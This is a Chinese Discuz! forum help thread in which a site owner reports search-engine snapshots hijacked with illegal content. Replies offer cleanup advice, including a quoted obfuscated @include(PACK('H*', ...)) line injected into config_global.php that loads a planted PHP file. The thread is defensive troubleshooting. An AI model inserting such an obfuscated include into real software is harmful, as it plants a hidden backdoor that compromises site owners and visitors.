返回列表 发帖
查看: 5056|回复: 9

[求助] 求助升级最新版网站被非法内容劫持百度快照

25

主题

87

回帖

148

积分

渐入佳境

贡献
0 点
金币
34 个
发表于 2019-8-26 19:29:42 | 显示全部楼层 |阅读模式
我这个站www.3811111.com前几天才上传的6.22最新版
昨天发现百度收录出现很多违法信息快照,以帖子好链接形式出现,门户的链接也出现,数字没有那么大,因为网站没有那么多帖子,搞不懂是咋回事了,换了一个服务器还是一样
001.png

002.png
003.png

我知道答案 回答被采纳将会获得1 贡献 已有9人回答
中国家电维修网http://www.3811111.com
家电维修网 http://www.bjjdwx.com
回复

使用道具 举报

73

主题

272

回帖

404

积分

炉火纯青

贡献
1 点
金币
45 个
发表于 2019-8-26 19:53:41 | 显示全部楼层
哥们儿你网站被域名劫持了  找个懂的人给你看看吧。

屏幕快照 2019-08-26 下午7.53.18.png
回复 支持 反对

使用道具 举报

73

主题

272

回帖

404

积分

炉火纯青

贡献
1 点
金币
45 个
发表于 2019-8-26 19:55:11 | 显示全部楼层
点击进入这个网站
屏幕快照 2019-08-26 下午7.54.12.png
回复 支持 反对

使用道具 举报

83

主题

2795

回帖

3564

积分

功行圆满

贡献
22 点
金币
351 个
发表于 2019-8-26 20:19:30 | 显示全部楼层

config下的config_global.php文件,找找恶意代码,如:

@include(PACK('H*','443A2F777777726F6F742F78676C6C2E636F6D2F75706C6F61642F696E7374616C6C2F696E636C7564652F696E7374616C6C5F63696E74656E2E706870'));

近似的字符,直接删除

更新缓存
回复 支持 反对

使用道具 举报

25

主题

87

回帖

148

积分

渐入佳境

贡献
0 点
金币
34 个
 楼主| 发表于 2019-8-27 09:10:44 | 显示全部楼层
allthebest 发表于 2019-8-26 20:19
config下的config_global.php文件,找找恶意代码,如:

@include(PACK('H*','443A2F777777726F6F742F78676 ...

谢谢,我重新更换了服务器,备份数据库下载最新的程序恢复,还是不行现在服务器爬满了蜘蛛,蜘蛛爬那些链接都是数字很大的,说明根本不是爬我论坛的帖子
123.png
中国家电维修网http://www.3811111.com
家电维修网 http://www.bjjdwx.com
回复 支持 反对

使用道具 举报

83

主题

2795

回帖

3564

积分

功行圆满

贡献
22 点
金币
351 个
发表于 2019-8-27 16:05:52 | 显示全部楼层
ghz0433 发表于 2019-8-27 00:10
谢谢,我重新更换了服务器,备份数据库下载最新的程序恢复,还是不行现在服务器爬满了蜘蛛,蜘蛛爬那些链 ...

这与config下的config_global.php文件有关,检查权限设置
回复 支持 反对

使用道具 举报

Fox
头像被屏蔽

0

主题

46

回帖

83

积分

禁止访问

贡献
0 点
金币
36 个
发表于 2019-8-27 17:47:20 来自手机 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

6

主题

12

回帖

25

积分

初学乍练

贡献
0 点
金币
6 个
QQ
发表于 2019-10-17 11:52:31 | 显示全部楼层
allthebest 发表于 2019-8-26 20:19
config下的config_global.php文件,找找恶意代码,如:

@include(PACK('H*','443A2F777777726F6F742F78676 ...

一万个赞!!!我跟楼主也一样的
看到里面有@clude的这串代码
请问还有哪些目录呢?一起处理
回复 支持 反对

使用道具 举报

18

主题

1839

回帖

2820

积分

应用开发者

贡献
53 点
金币
624 个
QQ
发表于 2019-10-17 15:25:21 | 显示全部楼层
高二天 发表于 2019-10-17 11:52
一万个赞!!!我跟楼主也一样的
看到里面有@clude的这串代码
请问还有哪些目录呢?一起处理 ...

建议官方文件恢复下 比较快
无限星辰工作室  好集导航 免费API
服务Discuz建站|定制|小程序|APP定制|故障维修|搬家|运维|挂马清理|防护|性能优化|安全运维|
服务理念:专业 诚信 友好QQ842062626 服务
回复 支持 反对

使用道具 举报

14

主题

1791

回帖

2058

积分

应用开发者

discuz 老兵

贡献
8 点
金币
188 个
QQ
发表于 2019-10-17 15:50:01 | 显示全部楼层



木马问题不是在程序本身,而是服务器的权限, 是某种的木马伪装成图片 通过上传头像 帖子等方式就上传到你服务器上了,要命的是你服务器还允许执行,
单纯的清理木马没用的 要服务器的安全最主要
您可以加我QQ交谈,有偿服务,专业清理+安防
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

  • 关注公众号
  • 有偿服务微信
  • 有偿服务QQ

手机版|小黑屋|Discuz! 官方交流社区 ( 皖ICP备16010102号 |皖公网安备34010302002376号 )|网站地图|star

GMT+8, 2024-5-7 04:01 , Processed in 0.108682 second(s), 8 queries , Redis On.

Powered by Discuz! W1.0 Licensed

Cpoyright © 2001-2024 Discuz! Team.

关灯 在本版发帖
有偿服务QQ
有偿服务微信
返回顶部
快速回复 返回顶部 返回列表